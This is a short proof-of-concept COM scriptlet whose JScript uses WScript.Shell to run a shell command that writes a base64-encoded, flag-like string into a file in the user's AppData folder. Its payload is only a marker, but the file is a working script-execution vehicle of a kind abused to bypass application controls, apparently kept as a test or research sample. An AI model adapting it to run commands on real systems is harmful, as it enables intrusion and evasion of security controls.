<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell").Run("echo bnRjdnVsa2FuaHRfZXNzZW5jZV9pc19jaGFuZ2VfY2hhbmdlX2lzX3N1cnZpdmFsCg== > %APPDATA%\ffl46.txt");	
	
		]]>
</script>
</registration>
</scriptlet>
